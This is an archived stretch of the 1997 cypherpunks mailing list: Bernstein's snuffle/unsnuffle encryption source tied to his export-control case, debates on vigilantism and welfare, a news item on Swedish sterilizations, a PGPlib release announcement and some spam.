/* What matters is x[9...63], y, k[0...63], h[0...63]. */ i = 0; while (((ch = getchar()) != EOF) && (ch != '\n')) if (i < 64) k[i++] = (unsigned char) ch; else if (i < 119) x[i++ - 55] = (unsigned char) ch; if (argv[1]) for (i = 0;argv[1][i] && (i < 64);i++) h[i] = argv[1][i]; while ((ch = getchar()) != EOF) { if (!(n & 31)) { for (i = 0;i < 64;i++) l[i] = k[i] ^ h[n - 64 + i]; Hash512(wm,wl,level,8); } x[n] = x[n - 24] + x[n - 55] + ((unsigned char) ch); h[n] = x[n] + m[n & 31]; y += h[n]; (void) putchar((char) y); n++; if (n == NMAX) { for (i = 0;i < 64;i++) { x[(n & 31) + i] = x[n - 64 + i]; h[(n & 31) + i] = h[n - 64 + i]; } n = (NMAX & 31) + 64; } } } ==============================8<============================== = unsnuffl.c =================8<============================== #include #include "snefru.h" #define NMAX 10000 main(argc,argv) int argc; char *argv[]; { register int ch; static unsigned char x[NMAX]; register unsigned char y = 0; static unsigned char h[NMAX]; static unsigned char m[32]; static unsigned char l[64]; static unsigned char k[64]; register int n = 64; register int i; register WORD32 *wm = &m[0]; register WORD32 *wl = &l[0]; register int level = 3; SetupHash512(); for (i = 0;i < 64;i++) x[i] = k[i] = h[i] = 0; /* What matters is x[9...63], y, k[0...63], h[0...63]. */ i = 0; while (((ch = getchar()) != EOF) && (ch != '\n')) if (i < 64) k[i++] = (unsigned char) ch; else if (i < 119) x[i++ - 55] = (unsigned char) ch; if (argv[1]) for (i = 0;argv[1][i] && (i < 64);i++) h[i] = argv[1][i]; while ((ch = getchar()) != EOF) { if (!(n & 31)) { for (i = 0;i < 64;i++) l[i] = k[i] ^ h[n - 64 + i]; Hash512(wm,wl,level,8); } h[n] = ch - y; y = ch; x[n] = h[n] - m[n & 31]; (void) putchar((char) (x[n] - x[n - 24] - x[n - 55])); n++; if (n == NMAX) { for (i = 0;i < 64;i++) { x[(n & 31) + i] = x[n - 64 + i]; h[(n & 31) + i] = h[n - 64 + i]; } n = (NMAX & 31) + 64; } } } ==============================8<============================== From anon at anon.efga.org Tue Aug 26 16:21:13 1997 From: anon at anon.efga.org (Anonymous) Date: Wed, 27 Aug 1997 07:21:13 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <4658230701dd4fd97f57a5ed14644a38@anon.efga.org> At 12:31 PM 8/26/97 PDT,"John Smith" wrote: |"William H. Geiger III" : | |>>You stole from me. |>>*BANG* |> |>yep |> |>>You raped my sister |>>*BANG* |> |>yep |> |>As is the first two cases the "criminal" has violated my property & |>family. Such crimes are worthy of immediate death. You steal, you |>assault |>or threaten me or my family you have committed suicide. |> |>It is a quite simple and effective philosophy: |> |>"You fuck with me, my family, or my property you die. You leave me |>alone |>and I leave you alone." |> |>Even someone like you can understand such a philosophy. | |Well, I can't. It's very confusing. Are there judges in your |philosophy, or do you just decide for yourself who to shoot? | |"You walked on my property." BANG. | |"Your music kept me awake all night." BANG. | |"I warned you to cut that tree down, and now it fell on my house." |BANG. | | |Or how about escalation: | |"You raped my daughter" | |"No way, she wanted it as much as I did" | |"That's not what she tells me. You die." BANG. | | |"You shot my son" | |"Bullshit, he had it coming after what he did to my daughter." | |"Bullshit yourself." BANG. | | |"You shot my pa" | |"He shot my son" | |"You're gonna die." "I'm taking you with me then." BANG. BANG. | |BANG. BANG. BANG. BANG. BANG. BANG. BANG. | | |You know, there's a reason people started using judges to help |settle disputes. There's a reason the common law evolved with the |idea of proportionate response and restitution. This kind of |shoot-everybody-I-think-harmed-me approach just doesn't work. |Nobody knows what someone else will consider harm worth shooting |over. If somebody disagrees that a shooting was justified, they'll |shoot back, and feuds begin. | |The current system stinks, but your idea is no better. | |"John Dear John, BANG! BangMonger From jamesd at echeque.com Tue Aug 26 17:11:35 1997 From: jamesd at echeque.com (James A. Donald) Date: Wed, 27 Aug 1997 08:11:35 +0800 Subject: FCPUNX:Jurisdiction Shopping Message-ID: <199708262356.QAA27668@proxy4.ba.best.com> At 11:06 AM 8/26/97 -0400, Duncan Frissell wrote: > Another popular reason is privacy in general. US domestic accounts can be > examined by any federal, state, or local government employee who can sign his > name to a subpeona. Any lawyer can also examine account records in the > course of discovery proceedings. There are some limits to the above powers > but not very substantial limits. For all we know, FINCEN has a nice Win32- > based point and click browser that can tiptoe through every bank and > brokerage account in America. If they don't have one yet, I'm sure they are > trying to get one. > > If domestic lawyers or governments want the same sort of access to accounts > in other jurisdictions, they have to spend many thousands of dollars and > months or years of personnel time. Cuts down on their capabilities. This is true to a greater or lesser extent of almost any foriegn jurisdiction. Even both countries are hostile to financial privacy and have cosy relationships with each other, it is still a lot more work for investigators in one country to get information from another. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From declan at well.com Tue Aug 26 18:14:06 1997 From: declan at well.com (Declan McCullagh) Date: Wed, 27 Aug 1997 09:14:06 +0800 Subject: Sweden's Social Democrats Sterilize the Inferior Message-ID: > >From: David Boaz >Subject: Social Democrats Sterilize the Inferior > >Surprisingly, the revelations about 40 years of forced sterilizations by the >Social Democratic governments in Sweden generated only small stories in the >New York Times and the Washington Post. I'm sure they would have been >equally uninterested in revelations about forced sterilization in, say, >Thatcher's Britain. Be sure to read to the last line of the story where at >last the AP pins it directly on the Social Democrats' ideas. > > > >By JIM HEINTZ >.c The Associated Press > >STOCKHOLM, Sweden (Aug. 25) - They were found to be ''inferior,'' flawed by >bad eyesight, mental retardation or ''undesirable'' racial characteristics. >To prevent this genetic heritage from being passed on, they were sterilized - >sometimes involuntarily. > >Sweden had as many as 60,000 of its own citizens sterilized between 1935 and >1976. Adults and children were singled out by doctors, school authorities or >other officials and were pressured to consent to the procedures. > >This sterilization program bore chilling similarities to Nazi ideas of racial >superiority - and media reports on it now are provoking sober >self-examination. > >The program stemmed from the pursuit of eugenics, a once-popular movement to >improve humanity by controlling genetic factors in reproduction. > >Though Sweden's sterilization program was a matter of record, it received >little public attention, ignored in schoolbooks and hardly mentioned in >reference works. A recent series by the prestigious newspaper Dagens Nyheter, >however, has stirred national debate. > >Especially shocking to many Swedes is the fact that the law allowing the >sterilizations wasn't overturned until 1976, three decades after the Nazis' >human engineering policies collapsed in the rubble of the Third Reich. > >The sterilizations targeted a wide range of people: those of mixed race; >unmarried mothers with several children; people judged to be habitual >criminals; even a boy considered ''sexually precocious.'' > >''Grounds for recommending sterilization: unmistakable Gypsy features, >psychopathy, vagabond life,'' reads one document cited by Dagens Nyheter. > >Maria Nordin, 72, told the newspaper she had been sterilized in 1943 because >she was regarded as mentally inferior. > >''One day, the (school) superintendent said I should come into his room to >sign some papers. I understood what this was about so I ran into a toilet and >sat there and cried for a long time for myself,'' she said. > >Sweden, with its well-developed welfare state and long-standing progressive >stances on social issues, is not accustomed to being on the defensive on >ethical issues. > >''This is a frightening picture that now is being shown to the Swedish >people,'' Alf Svensson, chairman of the opposition Christian Democratic >Party, said in a letter to Prime Minister Goeran Persson. > >Social Minister Margot Wallstroem says she is considering whether to >compensate people who were forcibly sterilized. That would require >overturning current law that says the victims can't get compensation because >the sterilizations were lawful when performed. > >Nordin applied for compensation last year but her request was turned down by >Wallstroem, who now says she feels ashamed over the matter. > >''I will take up the matter for discussion with the government. It is the >least I can do,'' the Cabinet minister said. > >The Dagens Nyheter report has hit Swedes at a time when they were already >examining some painful history from World War II. The government, under >increasing international pressure, is looking into whether property looted by >the Nazis from Jews in other countries ended up in Sweden. > >The issue of forced sterilization stands to be even more troublesome, because >it was conducted under the ostensibly benign gaze of the Social Democrats - >that party that built Sweden's welfare state and proclaimed it a paragon of >enlightened government. > >''The Social Democrats are implicated in a collective guilt,'' said Social >Minister Wallstroem, herself a member of the party. > >The sterilization programs can be traced to turn-of-the-century enthusiasm >for eugenics. > >The movement had adherents in many countries, but ''Sweden was the first in >the world to grant this pseudoscience official recognition,'' Dagens Nyheter >wrote in describing how Sweden established an Institute of Racial Biology in >1921. > >Not only did eugenics foresee an improved human race, it also was appealing >to Social Democrats, who were beginning to see that Sweden's welfare state >would be costly and wanted to limit the number of people who would have to be >supported, the newspaper said. > > AP-NY-08-25-97 1903EDT > > > From mbp at pharos.com.au Tue Aug 26 20:37:14 1997 From: mbp at pharos.com.au (Martin Pool) Date: Wed, 27 Aug 1997 11:37:14 +0800 Subject: Netscape Crypto In-Reply-To: Message-ID: On Tue, 26 Aug 1997, Jason William RENNIE wrote: > Does anybody know how strong the export netscape crypto stuff is ?? Netscape3 export version usually uses RC4 with a 40 bit shared key. > Is the stuff only 40 bit crypto for export ?? Key sizes are not a very meaningful indicator of security, which is a holistic thing. > A friend asked me about the secure credit stuff and if netscape was > secure for credit cards ?? I think that security in that respect probably has much more to do with the security of the server which receives your information, than with the cypher used in transit. Assure yourself that the person you send the information to is trustworthy and knows how to secure a computer system. Even weak HTTPS encryption will make it somewhat difficult for people to grab your information out of a proxy cache or log and similar trivial attacks. > So is the export copy secure ?? Compared to what? More secure than unencrypted, less secure than strongly-encrypted. More secure than Internet Explorer, less secure than Lynx. Probably. You'll probably only lose the $50 credit-card excess at most: I'd trust that to Netscape, if I was sending it to a reputable party. There's plenty of information I wouldn't trust to it. > I presuem the non-export wouldn't be to bad. Doubled punctuation is too bad. Martin Pool PGP email preferred From dformosa at st.nepean.uws.edu.au Tue Aug 26 20:38:09 1997 From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa}) Date: Wed, 27 Aug 1997 11:38:09 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708261244.HAA11451@mailhub.amaranth.com> Message-ID: On Tue, 26 Aug 1997, William H. Geiger III wrote: [...] > "You fuck with me, my family, or my property you die. You leave me alone > and I leave you alone." Thats fine and good. But if I can't trust the goverment to folow its own rules and uphold liberty how can I trust you? And how can I trust the next person? and the next? ... Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. Buy easter bilbies. Save the ABC Is $0.08 per day too much to pay? ex-net.scum and proud I'm sorry but I just don't consider 'because its yucky' a convincing argument From dformosa at st.nepean.uws.edu.au Tue Aug 26 20:47:46 1997 From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa}) Date: Wed, 27 Aug 1997 11:47:46 +0800 Subject: heart In-Reply-To: Message-ID: On Tue, 26 Aug 1997, Ray Arachelian wrote: > On Tue, 26 Aug 1997, ? the Platypus {aka David Formosa} wrote: [...] > > The cop can't become inhuman by any action thay take. > > How's that again? Earlier you were saying that if any human considers > another human inhuman, all huamns lose humanity points, Earliar I was wrong. The idear of group loss of humanity was sort of badly thourt out. However I stand by my original point that it is a bad idear to consider peaple inhuman. Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. Buy easter bilbies. Save the ABC Is $0.08 per day too much to pay? ex-net.scum and proud I'm sorry but I just don't consider 'because its yucky' a convincing argument From azwsxq at hotmail.com Tue Aug 26 21:51:42 1997 From: azwsxq at hotmail.com (luciana luciana) Date: Wed, 27 Aug 1997 12:51:42 +0800 Subject: How tO MutAte anD TaKE OVer tHe WOrld Message-ID: <19970827043758.22153.qmail@hotmail.com> I'm very interested on that. could u let me know anything else? ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From stend+cypherpunks at sten.tivoli.com Tue Aug 26 22:47:40 1997 From: stend+cypherpunks at sten.tivoli.com (Firebeard) Date: Wed, 27 Aug 1997 13:47:40 +0800 Subject: lack of evolutionary pressures (was Re: An end to "court (fwd) In-Reply-To: <3.0.2.32.19970823171955.0077e9b0@popd.ix.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >>>>> Bill Stewart writes: BS> Y'all appear to be violently agreeing on that point. Violent agreement is fun. Jim and I frighten our co-workers frequently with our violent agreement. - -- #include /* Sten Drescher */ Unsolicited bulk email will be stored and handled for a US$500/KB fee. It is by caffeine alone I set my mind in motion, it is by the beans of Java that thoughts acquire speed, the hands acquire shaking, the shaking becomes a warning, it is by caffeine alone I set my mind in motion. -- Carlos Nunes-Ueno, 3/29/95 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQBVAwUBNAO+RvCBWKvC9LiRAQFxfQH/ckNG0qnzdNvWnG9Cqtg2bzOisni7xbKZ o6vHvGgDMLr5RpzOwa5vm92+8gaisYXCzTFxJfao4EOL9cAsVPHqBw== =00wa -----END PGP SIGNATURE----- From shamrock at netcom.com Tue Aug 26 22:48:54 1997 From: shamrock at netcom.com (Lucky Green) Date: Wed, 27 Aug 1997 13:48:54 +0800 Subject: SF Bay Area D-H patent party? Message-ID: <3.0.2.32.19970826223336.006fa440@netcom10.netcom.com> Who in the SF Bay Area plans to throw a party in honor of the upcoming expiration of the Diffie-Hellman patent? Several people had mentioned in the past they might do so. [Some of your are bcc'ed]. The patent will expire just a few weeks from now. Anybody? Thanks, --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From remailer at bureau42.ml.org Tue Aug 26 22:58:53 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Wed, 27 Aug 1997 13:58:53 +0800 Subject: No. 8 / Re: Top 10 Ways to Make a Grouchy Old CypherPunk Smile Message-ID: <6xLav+KSu2owdNx5sSaw+g==@bureau42.ml.org> Top 10 Ways to Make a Grouchy Old CypherPunk Smile -------------------------------------------------- #10) Find his shoes for him. #9) Buy Kent Crispin a Dr. Kevorkian gift-certificate. #8) Lock. #7) #6) #5) #4) #3) #2) #1) [This space reserved for T.C. May] From kent at songbird.com Wed Aug 27 00:01:03 1997 From: kent at songbird.com (Kent Crispin) Date: Wed, 27 Aug 1997 15:01:03 +0800 Subject: heart In-Reply-To: <199708211706.TAA00218@xs1.xs4all.nl> Message-ID: <19970826235533.15022@bywater.songbird.com> On Mon, Aug 25, 1997 at 02:20:33PM -0700, Tim May wrote: > And I think that most of what passes for "help" actually does more harm > than good, at least in the longterm. There is no doubt that sometimes "help" does more harm than good. There is also no doubt that sometimes help does more good than harm. Platitudes like these don't really give one much real guidance. > For example, sending food aid to Third World countries sounds noble and > good. But most studies show the real effect of such aid: it destroys the > local infrastructure of food production and distribution. (Imagine being a > poor Somali farmer bringing your grain to market, and seeing tons of U.S. > grain being distributed freely...it wipes that farmer out, and his future > years of production are gone, even after the U.S. food aid is also gone.) So the farmer can die of starvation later rather than earlier. The problem is not with help, per se -- it's with the specifics of how the help is implemented. What do you think the farmer would chose -- get some food now, and take his chances with his food production at a later time, or die of starvation immediately? A current case is North Korea. Of course if you give them food it will help perpetuate an evil government. On the other hand, if you don't give them food, lot's and lot's of people would die. Tim's answer is that you might as well let them die, rather than perpetuate the government that enslaves them. Others aren't quite as cold-blooded as Tim. > For example, the welfare system. Who can argue that it produces persons > unable or unwilling to take the available jobs, mostly at or near minimum > wage? When a welfare mother of two or more children can collect the total > equivalent (direct payments, food coupons, tax exemptions, day care) of $15 > an hour, it would be foolish for her to apply for a job at Burger King for > $6.35 an hour, and then have to pay almost that amount to put her kids in > some day care center. The longer she is out of the job market, the worse it > gets. The welfare system obviously has all kinds of problems. It's not easy giving help without creating dependency. That doesn't mean it can't be done. > For example, saving people from their bad choices in life. When we force > insurers to cover those who do stupid, formerly uninsurable things, or when > we force the providers of legally and freely-chose substances (tobacco, > hamburger, guns, breast implants, rock climbing equipment, etc.) to pay for > the stupid actions of others, even if only imagined, costs rise and choices > narrow. Yep. I don't see this as the same category of trying to help people, though. Rather, I think this example points out the end result of our adversarial legal system. -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From kent at songbird.com Wed Aug 27 00:17:29 1997 From: kent at songbird.com (Kent Crispin) Date: Wed, 27 Aug 1997 15:17:29 +0800 Subject: snuffle.c (was Re: Reuter on Bernstein Ruling) In-Reply-To: <1.5.4.32.19970826160822.006e89a4@pop.pipeline.com> Message-ID: <19970827000107.12109@bywater.songbird.com> On Tue, Aug 26, 1997 at 11:15:28PM +0100, Adam Back wrote: > > snuffle and unsnuffle are only 64 lines each... so here they are. You > need snefru also (snuffle for those not following is a construction to > convert a hash function into an encryption function ... Bernstein's > example is set up to use snefru ... a hash function). [...] > > Shall we reimplement it in perl? I'm sure you would enjoy the exercise. However, I think it will probably sound better in C :-) [ftp://songbird.com/pub/snuffle.mid -- I may build up a collection of these...] > Adam -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From gnu at toad.com Wed Aug 27 15:24:39 1997 From: gnu at toad.com (John Gilmore) Date: Wed, 27 Aug 1997 15:24:39 -0700 (PDT) Subject: Govt seeking emergency stay in Bernstein case Message-ID: <199708272224.PAA09094@toad.com> Date: Wed, 27 Aug 1997 13:43:36 -0700 From: Cindy Cohn Hi all, Just talked to Mr. Coppolino at the Justice Department. They are filing ex parte emergency stay papers tonight or tomorrow morning to try to stay the impact of Judge Patel's ruling pending appeal. He'll be faxing me the documents when they are ready. He said yesterday that they would seek to stay the "export" of crypto source code, although not the teaching or discussion (whatever that means). Cindy ************************ Cindy A. Cohn McGlashan & Sarrail, P. C. 177 Bovet Road, 6th Floor San Mateo, CA 94402 (415) 341-2585 (tel) (415)341-1395 (fax) Cindy at McGlashan.com http://www.McGlashan.com From kent at songbird.com Wed Aug 27 00:28:04 1997 From: kent at songbird.com (Kent Crispin) Date: Wed, 27 Aug 1997 15:28:04 +0800 Subject: unruly cult members In-Reply-To: <199708250745.JAA08647@basement.replay.com> Message-ID: <19970827002203.43137@bywater.songbird.com> On Mon, Aug 25, 1997 at 09:45:06AM +0200, Name Withheld by Request wrote: > Would cult members kindly stop bickering and straying from the party > line? > > All this argument questioning sacred dogma is anti-cypherpunk, and > clearly bought on by failure to recite the daily mantra: > > "Krispin-hare-hare-krispin government is evil > Krispin-hare-hare-krispin nuke washington DC > Krispin-hare-hare-krispin gun down graffiti kids > Krispin-hare-hare-krispin sterelize the proles" > > You're becoming so unpredictable, this is sacrilege, cult members > are supposed to unquestioningly follow sacred dogma. > > Hare-Krispin The most amusing thing about this whole cult idea is how certain puppets dutifully stood up and reported how different they are from each other. KJ Krispinurthi From shamrock at netcom.com Wed Aug 27 00:34:45 1997 From: shamrock at netcom.com (Lucky Green) Date: Wed, 27 Aug 1997 15:34:45 +0800 Subject: Le Monde: "Militant Cypherpunks liberate crypto software" Message-ID: <3.0.2.32.19970827001900.00698280@netcom10.netcom.com> I am not making this up. Le Monde, a major French newspaper, discovered that "militant" Cypherpunks aid in the spread of crypto :-) In all fairness, the article is rather favorable. [Available in French only]. http://www.lemonde.fr/multimedia/sem3397/textes/act33971.html --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From shamrock at netcom.com Wed Aug 27 00:35:55 1997 From: shamrock at netcom.com (Lucky Green) Date: Wed, 27 Aug 1997 15:35:55 +0800 Subject: Cypherpunks party videos Message-ID: <3.0.2.32.19970827002823.006bf574@netcom10.netcom.com> Good stuff from HIP keeps trickling in. See Brian the HIP brain. Witness Cypherpunks dancing. Watch your's truly as a DJ. http://www.ito.com/mpeg/hip/ --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From rewards at t-1net.com Wed Aug 27 17:04:19 1997 From: rewards at t-1net.com (rewards at t-1net.com) Date: Wed, 27 Aug 1997 17:04:19 -0700 (PDT) Subject: IDEAL FOR BEGINNERS WORK-AT-HOME Message-ID: <199708272352.SAA32694@quick.we-deliver.net> /////////////////////////////////////////////////////////////////////////////// This Message was Composed using Extractor Pro Bulk E- Mail Software. If you wish to be removed from this advertiser's future mailings, please reply with the subject "Remove" and this software will automatically block you from their future mailings. //////////////////////////////////////////////////////////////////////////////// I have been a business owner for over 30 years, involved in various things, and I have found different strategies for making money, working at home.... I thought you might like to know, this really works, if you will only try it... For more information send e-mail to max at answerme.com From gnu at toad.com Wed Aug 27 17:41:56 1997 From: gnu at toad.com (John Gilmore) Date: Wed, 27 Aug 1997 17:41:56 -0700 (PDT) Subject: Bernstein decision: image files upgraded Message-ID: <199708280028.RAA11032@toad.com> If you couldn't read the decision because the original image files were too fuzzy, try them now. They're wider and longer, and a lot easier to read. They're almost as small as the previous ones, because we encoded them better. We're still working on scanning it in to plain text. http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/970825_decision.images John Gilmore From email at exoticwhispers.com Wed Aug 27 20:53:53 1997 From: email at exoticwhispers.com (email at exoticwhispers.com) Date: Wed, 27 Aug 1997 20:53:53 -0700 (PDT) Subject: High Society Magazine Clicks Message-ID: <199708272018.RAA00837@north.nsis.com> Dear Fellow Webmasters, I would like to take this opportunity to introduce you to the highest paying and most diversified Click Through Program on the web for Adult Webmasters, simply named "Serge Cash". http://sexia.com/~knight/RAW/TIM/ This is the real deal. No more NO NAME site Click Throughs Programs with low visitor to click ratios by fly by night companies. Get signed up with such International Adult Magazines such as Playgirl, High Society, Climax ..etc. Compare for yourself ! Here is a list of our current programs and their payouts: ** You choose how you want to be paid! RAW Clicks or UNIQUE Clicks ? ** Available Programs Payout Per Raw Click Payout Per Unique Click ------------------------------------------------------------------------------------------------------------------------- PINK BITS $.02875 (2.875 Cents) $.055 (5.5 Cents) PLAYGIRL MAGAZINE $.0325 $.055 HIGH SOCIETY MAGAZINE $.02875 $.055 CLIMAX MAGAZINE $.02875 $.055 AMATEUR AVENUE $.02875 $.055 XXSEX $.02875 $.055 ASS $.02875 $.055 SEXY CLIPS $.02875 $.055 We also pay our advertisers every two weeks and our minimum check amount is only 10.00. Give us a try for two weeks and see for yourself. Make sure our check arrives, and see how much more it is compared to your current sponsors. Complete information and Online Signup to get you started right away at: http://sexia.com/~knight/RAW/TIM/ Tim Goyetche Representing Serge's Cash From frissell at panix.com Wed Aug 27 06:57:48 1997 From: frissell at panix.com (Duncan Frissell) Date: Wed, 27 Aug 1997 21:57:48 +0800 Subject: Sweden's Social Democrats Sterilize the Inferior In-Reply-To: Message-ID: <3.0.2.32.19970827092748.036846ac@panix.com> -----BEGIN PGP SIGNED MESSAGE----- >>Not only did eugenics foresee an improved human race, it also was appealing >>to Social Democrats, who were beginning to see that Sweden's welfare state >>would be costly and wanted to limit the number of people who would have to be >>supported, the newspaper said. >> >> AP-NY-08-25-97 1903EDT No big deal. When I was in law school in Oregon in the mid '70s, the Oregon Board of Social Control [I kid you not] was still on the statute books although I don't think they had sterilized anyone for a while. Eugenics, widespread sufferage, prohibition, central banking, the direct election of Senators were all popular causes promoted by US progressives at the turn of the century. DCF "Three generations of imbeciles are enough." -- Oliver Wendell Holmes, Jr. writing for the majority and upholding eugenic sterilization in Buck v. Bell. http://www.findlaw.com/data/us/274/200.html BUCK v. BELL, Superintendent of State Colony for Epileptics and the Feeble Minded. 274 U.S. 200 (1927) -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBNAQrT4VO4r4sgSPhAQF7vwQAhcKeYbFQCDce8glt7PIyaccm5ij7eEtE x8B9fvDbbFMEFDltUpTRd/DCzQa6tYAcQCXrBGC+idp9vVAqnjW7De8DeGWOPweU JMpbW+fHAWDSe+eeQ4qP3lJpwUFTpbKxMf5iA1fYAwUAW/cS0nr19Or5POXx/QpW OzoqGL/HP7c= =9va5 -----END PGP SIGNATURE----- From rah at shipwright.com Wed Aug 27 07:18:33 1997 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 27 Aug 1997 22:18:33 +0800 Subject: Monkey Wrench into the works Message-ID: --- begin forwarded text Reply-To: "Myron Lewis" From: "Myron Lewis" To: "Robert Hettinga" Subject: Monkey Wrench into the works Date: Tue, 26 Aug 1997 22:25:55 -0400 MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-MimeOle: Produced By Microsoft MimeOLE Engine V4.71.1008.3 We communicated today about the DCSB luncheon at the Harvard Club and I have been looking at some of the e$pam traffic. I am somewhat amused because our company is about to throw a monstrous perturbation into Public-Private Key encryption. We invite you and everyone on the list (Please send this invitation out to them as the info on how to do that didn't come through.) to visit the KeyGen webpage, www.KeyGen.com and learn about Automatic Synchronized KeyGeneration(TM). If you think you recognize it as something you have seen before, you're close but wrong. We are obviously biased, but we feel strongly and so do many others, that ASK will solve many of the security problems presently under discussion. In time, it will probably sink Key Management and Certificate Authorities. We welcome everyone's comments as long as they keep an open mind and don't feel cemented in to key management. I would like to respond to your request for speakers and offer to speak at one of the luncheons about Automatic Synchronized KeyGeneration. Regards, Myron Lewis President KeyGen Corporation The Key to Secure Communications --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From rah at shipwright.com Wed Aug 27 07:23:29 1997 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 27 Aug 1997 22:23:29 +0800 Subject: PGPlib-0.3 is available Message-ID: --- begin forwarded text To: pgplib-announce at cryp.to Subject: PGPlib-0.3 is available Date: Wed, 27 Aug 1997 11:10:03 +0200 From: Tage Stabell-Kulo Reply-To: tage at acm.org Sender: pgplib-announce-owner at cryp.to Precedence: list -----BEGIN PGP SIGNED MESSAGE----- This mail is sent on the list pgplib-announce at cryp.to. It is a (very) low voulme list where announcments are made when new versions of PGPlib becomes available. Please find below a copy of the file README distributed with this new release. Instructions on how to obtain your own copy of PGPlib is included. === Welcome to version 0.3 of PGPlib. This code has not yet matured enough to reach version 1.0. However, this is probably the latest development version before 1.0. Detailed instructions for how to obtain this fine code can be found at the end. Experienced users will know that ftp://dslab1.cs.uit.no/pub/PGPlib.tar.gz is the place to look. What is here for you ===================== PGPlib is a library that lets you generate (and manipulate) PGP packets without having to run PGP. In particular there is code to generate and understand the following types of PGP packets: - Data can be signed with a private key; - Data can be encrypted with a public key; - Data encrypted with your public key can be decrypted; - You can verify signatures on public keys and on buffers (files); - Convential encrypted (IDEA with Zimmermann's context sensitive feedback). The library can both read (decrypt) and write (encrypt) convential packets (in PGP format); - Armor. You can (de)armor a buffer or a file into a buffer or a file; - UserID packets are read and written in a variety of formats; - Literal with filename, mode, etc. You can create literate packages from files, or from buffers, and create files from literate packets; - Keys can be obtained from a database (which is provided) or by parsing keyrings. Keys can be kept in buffers or on files; - You can maintain a PGP public-key database (I use this library to maintain a database with ~40.000 keys). There is code to use DBM as supplied from Berkeley. A copy of DBM is included for your convinience. In general, PGPlib operates on buffers in order for you to use it in your applications. You will find included a small program that will (de)armor anything, a parser to parse PGP files (including decryption and so on), a shell to manipulate a keydatabase, a keyserver to run on top of such a database, a program to verify signatures on keys and/or files, a program to split keyrings in smaller parts and a program that will sign files for you. You will find all these (and more) in the PGPlib/applications/ directory. None of these uses PGP, the library provides all the functionality you need. What is not there for you ========================= - Sufficient documentation. I have written this library because I need it. In order to make life less hard for my students, I will have to provide some documentation. Possibly even on-line. However, quite a few manual pages are included. What you need ============= - Unix (for some definition of "Unix"). - You must have the SSLeay library as I have not implemented any cryptographic functionality; I hope SSLeay is a good choice. I did not major in mathematics and can thus not judge the quality of their work, although it looks solid (to me). I link with their version 0.8.1. I rely on SSLeay for many things, in particular their BIGNUMs, RSA encryption and IDEA. You can obtain your copy of SSLeay from: * ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/ - SSLeay source * ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/ - SSL applications * http://www.psy.uq.oz.au/~ftp/Crypto/ssl.html - SSLeay Programmer Reference SSLeay is quite large and I only use a fraction of it. other hand, SSLeay seems to be well maintained and their crypto-library might very well shrink or become more modular as time passes. Also, work is in progress to strip out from SSLeay only thise parts that PGPlib uses. Porting ======= PGPlib has been developed on NetBSD 1.2. It should compile smoothly on FreeBSD, HP-UX and Linux. If you port PGPlib to some other platform, I would be greatful if you would send me patches. In particular, PGPlib does not compile on SunOS 4 and 5, your assistance would be valuable. Regarding PGP ============= - Work is underway to ensure that PGPlib is compliant with RFC1991. - The name PGPlib might not be final as I respect Zimmermann's "ownership" of the acronym PGP and he might not like that this library uses the name PGPlib. Thus, this library might become libRFC1991.a or something. - PGP-5.0 is available. It has several new features, such as a multitude of encryption methods. PGPlib might evolve to support them all. Your Feedback ============ Your feedback is solicited. Peter Simons has created a mailinglist for PGPlib. To subscribe, send an e-mail to the address pgplib-dev-request at crypt.to and write the command SUBSCRIBE into the BODY. If you want to be subscribed under a different address than the one you're mailing from, you can also use SUBSCRIBE yourname at somewhere.else to do the trick. To post to the list, send an e-mail to pgplib-dev at cryp.to as usual. There is also (very low volume) list pgplib-announce at cryp.to. Subscribe by sending an e-mail to pgplib-announce-request at cryp.to with SUBSCRIBE in the body. Both lists are archived at URL:http://www.cryp.to/ If you write a nice application based on this library (the ultimate feedback :-), please feel free to send it to me and I will include it in the next release; Where to get PGPlib =================== ftp://dslab1.cs.uit.no/pub/PGPlib.tar.gz This file is a link to the latest version. If you obtain the file PGPlib-0.3.tar.gz instead, note that a name conflict will occur when you unpack the file (see below). What to do ========== First, uncompress PGPlib, which should give you the file PGPlib.tar. When you unpack PGPlib.tar you will get three files in your CURRENT directory. These files are README : This file PGPlib-0.3.tar : The library PGPlib-0.3.tar.sig : My signature on the above. Verify the signature by running pgp PGPlib-0.3.tar.sig and verify that PGP prints Good signature from user 